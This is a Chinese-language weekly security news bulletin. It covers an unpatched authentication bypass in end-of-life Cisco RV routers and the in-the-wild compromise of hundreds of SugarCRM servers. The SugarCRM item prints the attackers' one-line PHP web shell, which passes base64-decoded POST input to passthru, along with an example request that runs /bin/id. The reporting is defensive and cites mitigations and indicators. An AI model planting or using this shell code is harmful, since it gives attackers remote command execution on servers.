安芯网盾内存安全周报专栏，希望帮助企业更好的理解内存安全相关问题。让用户更好的认识、发现问题，防止外部入侵等威胁、有效的对系统进行安全设计，以实时防御并终止无文件攻击、0day /Nday攻击、缓冲区溢出攻击、基于内存的攻击等。

一、 Cisco警告：报废的路由器中存在具有公开利用代码的身份验证绕过漏洞（1 .11）

今天，思科警告客户注意一个影响多款报废VPN路由器且具有公开利用代码的严重的身份验证绕过漏洞。

详细情况

该安全漏洞 (CVE-2023-20025) 是奇虎360 Netlab 的Hou Liuyang在 Cisco Small Business RV016、RV042、RV042G 和 RV082 路由器的基于Web的管理界面中发现的。

这是由于传入 HTTP 数据包中的用户输入验证不正确造成的。未经身份验证的攻击者可以通过向具有漏洞的路由器的基于Web的管理界面发送特别构造的HTTP请求来远程利用该漏洞进而绕过身份验证。

成功利用该漏洞可以获得 root 访问权限。思科今天还表示，攻击者若组合利用该漏洞与另一个被跟踪为CVE-2023-2002的漏洞，可以在底层操作系统上执行任意命令。

Cisco虽然将其评为严重漏洞，同时表示其产品安全事件响应团队(PSIRT)知道野外可用的概念验证漏洞利用代码，但还是表示：“没有也不会发布软件更新来解决这个漏洞。”

幸运的是，Cisco PSIRT没有发现有该漏洞在攻击中被滥用。

禁用管理界面以阻止攻击

虽然RV016 和 RV082 WAN VPN 路由器最后出售是在 2016年1月和2016年5月，但其最后订购日期是2020 年1月30日，并且这两款路由器在2025年1月31日之前都能得到支持。

虽然没有此漏洞的解决方法，管理员也可以禁用存在漏洞的路由器的基于Web的管理界面并阻止访问端口443和60443，进而阻止利用尝试。

为此，您必须登录到每个设备的基于Web的管理界面，再转到防火墙>常规，然后取消远程管理的勾选。

Cisco在今天发布的安全公告中，还提供了详细步骤来阻止访问端口443和60443。

实施上述缓解措施后，仍可访问受影响的路由器并通过LAN接口进行配置。

参考链接

https://www.bleepingcomputer.com/news/security/cisco-warns-of-auth-bypass-bug-with-public-exploit-in-eol-routers/?&web_view=true

二、数百台SugarCRM 服务器因严重的在野攻击被感染（1 .12）

攻击者利用该漏洞通过Web Shell后门感染本地服务器。

详细情况

在过去的两周里，黑客都在利用SugarCRM（客户关系管理）系统中的一个严重漏洞，让用户感染恶意软件，使他们能够完全控制自己的服务器。

12月下旬，该零日漏洞的利用代码在网上被公布。发布该漏洞的人称其为远程执行代码的身份验证绕过，这意味着攻击者利用它在有漏洞的服务器上运行恶意代码，并且无需凭证。

网络监控服务公司Censys的高级安全研究员 Mark Ellzey在一封电子邮件中表示，截至1月11日，该公司已检测到354台SugarCRM服务器因该零日漏洞被利用而感染。这大约占Censys检测到的总计3,059台SugarCRM服务器的12%。截至上周，被感染的服务器数量最多的是美国，有90台，其次是德国、澳大利亚和法国。在周二的更新中，Censys表示感染数量自最初发布以来并未增加太多。

SugarCRM于1月5日发布的公告提供了修复程序，还表示已将修复程序应用到了他们的基于云的服务。它还建议在SugarCloud或SugarCRM托管主机之外运行实例的用户安装修复程序。公告表示，该漏洞影响了Sugar Sell、Serve、Enterprise、Professional和Ultimate软件解决方案。它没有影响Sugar Market的软件。

Censys表示，身份验证绕过主要针对 /index.php/ 目录。“身份验证绕过成功后，从服务中获取一个 cookie，然后将二次POST请求发送到路径'/cache/images/sweet.phar'，这一路径会上传一个包含 PHP 代码的小型PNG编码文件，当这个文件发出另一个请求时，服务器会执行这一文件”，公司研究人员补充道。

当使用hexdump软件分析二进制文件并解码时，PHP 代码大致翻译为：

〈?php

echo“#####”；

passthru(base64_decode($_POST[“c”]));

echo“#####”；

?〉

“这是一个简单的web shell，它将根据 'c' 的base64编码查询参数值执行命令（例如，'POST /cache/images/sweet.phar?c=”L2Jpbi9pZA==”HTTP/1.1'，将以与运行 Web 服务的用户 ID 相同的权限执行命令“/bin/id”，帖子解释道。

Web shell提供了一个基于文本的窗口，攻击者可以利用其在受感染的设备上运行命令或他们选择的代码界面。Censys的Ellzey表示，无法弄清楚攻击者使用这些shell的目的。

Censys和SugarCRM公告中都提供了威胁指标，SugarCRM的客户可以利用这些指标来判断他们是否已成为攻击目标。使用具有漏洞的产品的用户应尽快调查并安装修复程序。

参考链接

https://arstechnica.com/information-technology/2023/01/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit/?&web_view=true